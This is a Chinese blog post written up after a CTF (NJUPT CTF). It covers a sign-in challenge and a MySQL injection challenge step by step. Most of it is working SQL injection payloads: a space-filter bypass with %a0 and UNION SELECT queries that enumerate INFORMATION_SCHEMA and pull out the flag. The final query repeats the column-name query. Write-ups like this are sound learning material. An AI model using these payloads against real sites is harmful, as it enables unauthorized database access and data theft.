前些天 国光老哥在群里问有没有打NJUPT CTF的 校外和他组队 然后问了问光光老哥说是 面向校外 不能太简单 但是对新手也不会太不友好 然后就本着去学东西 练习的态度 抱老哥的大腿去(嘻嘻)最后果然 校外队第九 咳咳 虽然我只是观众 大佬们都很强哟 但是也不希望自己一直都是观众 所以 特此总结一些题 希望以后越来越🐮🍺
签到题
满怀自信的右键源代码 然后发现并没有flag 最后大佬们发现直接访问主域名 老把精力放在了secret.php 这上面
滴!晨跑打卡
这道题 是自己复习的重点了
点进去 知道考察的是 mysql 注入 但是 当时自己就是搞不出来 还差的远 事后又请教了国光老哥
验证注入是否存在
验证时候发现过滤了空格 用%a0即可绕过
1 | '%a0||'1 |
这里直接查询出所有的数据了
如果没有这个语句的话 默认只查询出1条数据
‘ or ‘1 相当于构造出一个用真的条件
开始进行注入
咳咳 大佬语录记录一下 !借助hackbar可以进行快速的注入
判断注入的字段数
1 | '%a0union%a0select%a01,2,3||'1 |
所有数据库
1 | http://ctfgame.acdxvfsvd.net:20001/index.php?id=1%27%a0UNION%a0SELECT%a0(SELECT%a0GROUP_CONCAT(schema_name%a0SEPARATOR%a00x3c62723e)%a0FROM%a0INFORMATION_SCHEMA.SCHEMATA),2,3||%271 |
咳咳根据我多年打酱油的经验
查询flaaaaaaag数据库下面的表
1 | http://ctfgame.acdxvfsvd.net:20001/index.php?id=1%27%a0UNION%a0SELECT%a0(SELECT%a0GROUP_CONCAT(table_name%a0SEPARATOR%a00x3c62723e)%a0FROM%a0INFORMATION_SCHEMA.TABLES%a0WHERE%a0TABLE_SCHEMA=0x666c6161616161616167),2,3||%271 |
f144444444g
查询列名
1 | http://ctfgame.acdxvfsvd.net:20001/index.php?id=1%27%a0UNION%a0SELECT%a0(SELECT%a0GROUP_CONCAT(column_name%a0SEPARATOR%a00x3c62723e)%a0FROM%a0INFORMATION_SCHEMA.COLUMNS%a0WHERE%a0TABLE_NAME=0x6631343434343434343467),2,3||%271 |
查出数据
1 | http://ctfgame.acdxvfsvd.net:20001/index.php?id=1%27%a0UNION%a0SELECT%a0(SELECT%a0GROUP_CONCAT(column_name%a0SEPARATOR%a00x3c62723e)%a0FROM%a0INFORMATION_SCHEMA.COLUMNS%a0WHERE%a0TABLE_NAME=0x6631343434343434343467),2,3||%271 |
nctf{this_1s_paocao_sqllllll}